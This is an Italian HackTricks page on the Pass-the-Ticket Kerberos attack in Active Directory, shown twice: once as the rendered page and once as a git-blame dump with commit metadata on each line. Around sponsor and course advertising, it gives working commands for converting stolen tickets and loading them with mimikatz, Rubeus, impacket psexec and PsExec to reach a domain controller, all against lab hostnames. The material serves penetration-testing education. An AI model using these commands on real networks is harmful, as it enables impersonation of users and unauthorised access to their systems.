hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md

# Passa il Ticket

<details>

<summary><strong>Impara l'hacking AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos di github.

</details>

<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Usa [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) per creare e **automatizzare facilmente flussi di lavoro** supportati dagli strumenti **comunitari più avanzati** al mondo.\
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

## Passa il Ticket (PTT)

Nel metodo di attacco **Passa il Ticket (PTT)**, gli attaccanti **rubano il ticket di autenticazione di un utente** anziché la loro password o valori hash. Questo ticket rubato viene quindi utilizzato per **impersonare l'utente**, ottenendo accesso non autorizzato a risorse e servizi all'interno di una rete.

**Leggi**:

* [Raccolta di ticket da Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
* [Raccolta di ticket da Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)

### **Scambio di ticket Linux e Windows tra piattaforme**

Lo strumento [**ticket\_converter**](https://github.com/Zer1t0/ticket\_converter) converte i formati dei ticket utilizzando solo il ticket stesso e un file di output.
```bash
python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
```
### Attacco Pass-the-Ticket

In Windows [Kekeo](https://github.com/gentilkiwi/kekeo) può essere utilizzato.
```bash
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
```
{% endcode %}

{% code title="Windows" %}Pass-the-Ticket{% endcode %}
```bash
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
```
{% endcode %}

## Riferimenti

* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)

<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Usa [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) per creare e **automatizzare facilmente flussi di lavoro** supportati dagli strumenti della comunità più avanzati al mondo.\
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

<details>

<summary><strong>Impara l'hacking su AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se desideri vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repository di Github.

</details>
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`# Passa il Ticket`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:16 +00:00			`<summary><strong>Impara l'hacking AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Altri modi per supportare HackTricks:`
arte 2024-01-02 18:28:04 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`* Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Scopri [La Famiglia PEASS](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Condividi i tuoi trucchi di hacking inviando PR a [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos di github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
update 2023-01-01 16:19:07 +00:00			`\`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`Usa [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) per creare e automatizzare facilmente flussi di lavoro supportati dagli strumenti comunitari più avanzati al mondo.\`
			`Ottieni l'accesso oggi:`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:16 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`## Passa il Ticket (PTT)`
a 2024-02-08 03:06:37 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:16 +00:00			`Nel metodo di attacco Passa il Ticket (PTT), gli attaccanti rubano il ticket di autenticazione di un utente anziché la loro password o valori hash. Questo ticket rubato viene quindi utilizzato per impersonare l'utente, ottenendo accesso non autorizzato a risorse e servizi all'interno di una rete.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Leggi:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`* [Raccolta di ticket da Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)`
			`* [Raccolta di ticket da Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`### Scambio di ticket Linux e Windows tra piattaforme`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`Lo strumento [ticket\_converter](https://github.com/Zer1t0/ticket\_converter) converte i formati dei ticket utilizzando solo il ticket stesso e un file di output.`
a 2024-02-08 03:06:37 +00:00			```bash
			`python ticket_converter.py velociraptor.ccache velociraptor.kirbi`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Converting ccache => kirbi`
a 2024-02-08 03:06:37 +00:00
			`python ticket_converter.py velociraptor.kirbi velociraptor.ccache`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Converting kirbi => ccache`
			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`### Attacco Pass-the-Ticket`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`In Windows [Kekeo](https://github.com/gentilkiwi/kekeo) può essere utilizzato.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
Translated to Italian 2024-02-10 13:03:23 +00:00			`export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass`
			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`{% endcode %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`{% code title="Windows" %}Pass-the-Ticket{% endcode %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Load the ticket in memory using mimikatz or Rubeus`
			`mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"`
			`.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi`
			`klist #List tickets in cache to cehck that mimikatz has loaded the ticket`
			`.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd`
			```
			`{% endcode %}`

Translated to Italian 2024-02-10 13:03:23 +00:00			`## Riferimenti`
GitBook: [#3568] No subject 2022-10-05 21:51:12 +00:00
			`* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
update 2023-01-01 16:19:07 +00:00			`\`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`Usa [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) per creare e automatizzare facilmente flussi di lavoro supportati dagli strumenti della comunità più avanzati al mondo.\`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`Ottieni l'accesso oggi:`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:16 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:16 +00:00			`<summary><strong>Impara l'hacking su AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Altri modi per supportare HackTricks:`
arte 2024-01-02 18:28:04 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`* Se desideri vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
Translated to Italian 2024-02-10 13:03:23 +00:00			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`* Scopri [The PEASS Family](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`* Condividi i tuoi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repository di Github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`